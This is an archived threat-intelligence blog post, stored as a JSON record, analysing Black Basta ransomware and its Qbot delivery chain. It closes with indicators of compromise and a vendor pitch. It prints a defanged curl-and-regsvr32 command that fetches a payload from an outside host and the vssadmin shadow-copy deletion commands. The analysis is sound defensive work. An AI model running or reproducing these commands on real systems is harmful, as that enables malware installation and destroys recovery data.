{
	"id": "018795e9-ffa3-43fe-a0f6-285c0aadb88c",
	"created_at": "2026-04-06T00:17:45.859431Z",
	"updated_at": "2026-04-10T13:12:12.985316Z",
	"deleted_at": null,
	"sha1_hash": "3ee126b2405d0a93194023932cede158188edf64",
	"title": "Preventing Black Basta Ransomware in 2022 | Deep Instinct",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 765973,
	"plain_text": "Preventing Black Basta Ransomware in 2022 | Deep Instinct\r\nBy Shaul Vilkomir-PreismanThreat Intelligence Researcher\r\nPublished: 2022-08-18 · Archived: 2026-04-05 20:16:24 UTC\r\nIntroduction\r\nDespite its recent emergence on the threat landscape, Black Basta ransomware is quickly becoming a significant\r\nthreat that should be on the radar of SecOps teams worldwide. Black Basta has already executed multiple rapid-fire breaches by utilizing Qakbot/Qbot as its means of delivery and also targets Linux ESXi systems to amplify its\r\npotential impact on a targeted environment.\r\nBlack Basta Origins\r\nLittle is known about the group currently operating Black Basta, however, there may be an association with the\r\nnow-defunct Conti group based on similarities in both actors’ TOR network sites. It has been suggested that Black\r\nBasta is a splinter-group that broke off from Conti during the latter’s collapse.\r\nBlack Basta with Qbot – A powerful partner for attack\r\nBlack Basta does not self-propagate. Instead, it relies on Qbot to propagate throughout a targeted environment\r\nbefore leveraging the banking trojan to deliver its payload.\r\nQbot has been a well-known presence on the threat landscape for more than a decade. It is most commonly\r\ndistributed through large phishing email campaigns, often employing complex, multi-stage downloaders that use\r\nmultiple file types including Office documents, .HTML files, .ISO, and .LNK files. Qbot also employs\r\nvulnerability exploits and relatively uncommon techniques such as .DLL side-loading.\r\nA typical Qbot infection chain starts with a thread-hijacked email message; this is a response to an existing\r\ncorrespondence from a hijacked email account intended to trick the recipient into thinking the message is from\r\nsomeone they know and engage with.\r\nhttps://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence\r\nPage 1 of 8\n\nFigure 1- Qbot infection email on a pre-existing thread.\r\nThe attached .HTML file contains an embedded, password protected .ZIP file which is dropped to the user’s\r\nDownloads directory when the .HTML file is opened.\r\nFigure 2- Embedded .ZIP file in .HTML.\r\nThe password protected .ZIP file (the password is provided in the email) contains a .LNK file which executes the\r\nfollowing command in order to download the Qbot .DLL payload to the victim’s temp directory as “goAlso.rtf”\r\nand execute it using regsvr32.\r\nFigure 3- .LNK file responsible for download and execution of Qbot payload.\r\n%windir%\\System32\\cmd.exe /c %windir%\\system32\\curl -s -o %temp%\\goAlso.rtf http[:]//146[.]70[.]79[.\r\nIn this instance, Qbot’s .DLL payload is signed using a bogus certificate, which has since been revoked.\r\nhttps://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence\r\nPage 2 of 8\n\nFigure 4-Signed Qbot payload .DLL (valid at time of execution).\r\nFollowing initial access, Qbot will employ tools such as Cobalt Strike and AdFind in order to move laterally\r\nacross the network, enabling RDP log-ons and disabling defenses as it traverses the victim network.\r\nBlack Basta Ransomware in Action\r\nNow we’ll look at how a Black Basta ransomware attack occurs. There are two different variants – the Windows\r\nvariant and the ESXi variant.\r\nThe Windows variant\r\nBlack Basta is written in C++, does not employ code obfuscation or packing, and contains many hard-coded\r\nfeatures, hinting that it may still be a work in progress.\r\nOnce delivered and executed, Black Basta will check for the presence of a hard-coded mutex (“dsajdhas.0”) and,\r\nif not found, will create it and proceed to delete shadow copies present on the victim’s system in order to inhibit\r\nrecovery:\r\nhttps://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence\r\nPage 3 of 8\n\nFigure 5- Mutex Check.\r\nFigure 6- Mutex Creation.\r\nFigure 7- Shadow copy deletion.\r\nThe above partial snippet results in the commands below being executed on the victim‘s machine:\r\ncmd.exe /c C:\\Windows\\SysNative\\vssadmin.exe delete shadows /all /quiet\r\ncmd.exe /c C:\\Windows\\System32\\vssadmin.exe delete shadows /all /quiet\r\nIf the mutex is found, Black Basta will display a notification and terminate itself:\r\nFigure 8- Mutex detected.\r\nThis is common behavior in many types of ransomware.\r\nHow does Black Basta Ransomware work?\r\nFollowing the deletion of shadow copies, Black Basta will modify the system’s wallpaper and set a default file\r\nicon for its own “.basta” encrypted file extension, both of which are hard-coded into the executable and written to\r\nthe user’s %temp% directory (this technique is also quite common in ransomware).\r\nhttps://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence\r\nPage 4 of 8\n\nFigure 9- Sets Wallpaper.\r\nFigure 10- Sets default file icon.\r\nBlack Basta then encrypts files on the victim’s file system, excluding several file system locations and file\r\nextensions (including its own, listed below), in order to reduce the chances of completely “breaking” the executing\r\nmachine; it does this by using a randomly generated ChaCha20 key which is then encrypted using a hard-coded\r\nRSA public key and appended to the end of every encrypted file.\r\nThe combination of ChaCha20 and RSA is likely to have been chosen due to its relative speed, which reduces the\r\ntime it takes to encrypt large amounts of data.\r\nExclusions:\r\n$Recycle.Bin\r\nWindows\r\nDocuments and Settings\r\nLocal Settings\r\nApplication Data\r\nOUT.txt\r\nboot\r\nreadme.txt (Its ransom note)\r\ndlaksjdoiwq.jpg (Its wallpaper)\r\nNTUSER.DAT\r\nfkdjsadasd.ico (Its default file icon)\r\n.com\r\n.exe\r\n.bat\r\n.cmd\r\n.basta (Its file extension)\r\nThe ransom note, also hard-coded into the executable, is dropped at every file system location which is encrypted\r\nas “readme.txt” and contains a hard-coded “victim ID.” The ransom note refers the reader to Black Basta\r\noperator’s TOR site.\r\nhttps://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence\r\nPage 5 of 8\n\nFigure 11- Ransom note.\r\nBlack Basta’s operators can also selectively encrypt specific file system paths by using built-in “-forcepath”\r\ncommand line parameters and providing a specific path to be encrypted. This enables the operators to encrypt\r\nspecific paths without going through the entire machine, drastically reducing its execution time.\r\nFigure 12- Forced path.\r\nExamined Black Basta samples did not contain any data exfiltration mechanisms, and it is assumed that\r\nexfiltration of data takes place prior to the delivery of the ransomware payload.\r\nThe ESXi variant\r\nBlack Basta’s Linux/ESXi variant is very similar to the Windows variant; both variants contain the same hard-coded ransom note and use the same encryption scheme.\r\nThe ESXi variant encrypts data in “/vmfs/volumes,” which contains all the virtual machine data on an ESXi server,\r\nbringing everything that was running on that server to a grinding halt, all without “breaking” the server itself.\r\nAdditionally, it contains the same ability to encrypt specific operating system paths using the “-forcepath”\r\ncommand line parameter.\r\nOf note, this variant can also be executed on Windows systems by means of Windows Sub-System for Linux\r\n(WSL), a technique that is attracting growing attention as an attack surface.\r\nConclusion: Black Basta ransomware detection and prevention with Deep Instinct\r\nWhile Black Basta is not particularly sophisticated, its employment of Qbot provides it with ample opportunities\r\nfor attack. Its use of a Linux/ESXi variant can make it particularly dangerous to organizations since it can\r\npotentially target both Windows workstations and ESXi servers, which host virtual machines that are often critical\r\nto an organization’s ongoing operation.\r\nhttps://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence\r\nPage 6 of 8\n\nDeep Instinct prevents Black Basta and other advanced malware, pre-execution. Using deep learning models to\r\nprevent malicious files from being executed, Deep Instinct can predict and prevent known, unknown, and zero-day\r\nthreats in \u003c20 milliseconds, 750X faster than the fastest ransomware can encrypt. Our deep learning, prevention-first approach allows us to detect and prevent even the most advanced threats with \u003e99% zero-day accuracy.\r\nIf you’d like to learn more about our malware, ransomware, and zero-day prevention capabilities – including our\r\nindustry-best $3M no-ransomware guarantee – we’d be honored to give you a demo.\r\nIOCs\r\nQbot\r\nCrmReport_948575.html\r\n(sha256)\r\n3b5ff11fe11246c91d29cde511a22636524e91e29842dde6327fe92484e08f47\r\nCrmReport_948575.zip\r\n(sha256, password = abc123)\r\n7c79cd208b8d052bbc957d70b21dc4f548f2f48e2696005b99ff4ce5cf41f5d1\r\nCrmReport_948575.lnk\r\n(sha256)\r\nff4fe3c3f2f6a65f43943b3326dd47686bc48c53a7c6714602c1b547a8e8b538\r\nQbot Payload (sha256) 7385cc993ec169ad06a4e367b5ad65b9d6a231fe385d11fe8c3757d557932e8c\r\nQbot Payload (sha256) 99692f5a1ca26b896d8c3220c42db7adc3007837a9b0d12d60d888f01f92fbbf\r\nPayload Host http[:]//146.70.79.52/\r\nQbot payload certificate\r\nthumbprint (sha1)\r\n2bee3f716b80273db9639376a296cf19cdba0f1a\r\nBlack Basta\r\nBlack Basta Windows\r\nVariant (sha256)\r\n203d2807df6ef531efbec7bfd109986de3e23df64c01ea4e337cbe5ba675248b\r\nBlack Basta Windows\r\nVariant (sha256)\r\n9fce9ee85516533bae34fc1184a7cf31fa9f2c7889b13774f83d1df561708833\r\nBlack Basta Linux/ESXi\r\nVariant (sha256)\r\n0d6c3de5aebbbe85939d7588150edf7b7bdc712fceb6a83d79e65b6f79bfc2ef\r\nBlack Basta TOR site https[:]//aazsbsgya565vlu2c6bzy6yfiebkcbtvvcytvolt33s77xypi7nypxyd.onion/\r\nBlack Basta – Victim system IOC\r\nMutex Mdsajdhas.0\r\nhttps://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence\r\nPage 7 of 8\n\nWallpaper %temp%\\dlaksjdoiwq.jpg\r\nFile Icon %temp%\\fkdjsadasd.ico\r\nRegistry HKCR\\.basta\\\r\nSource: https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence\r\nhttps://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence"
	],
	"report_names": [
		"black-basta-ransomware-threat-emergence"
	],
	"threat_actors": [],
	"ts_created_at": 1775434665,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3ee126b2405d0a93194023932cede158188edf64.pdf",
		"text": "https://archive.orkl.eu/3ee126b2405d0a93194023932cede158188edf64.txt",
		"img": "https://archive.orkl.eu/3ee126b2405d0a93194023932cede158188edf64.jpg"
	}
}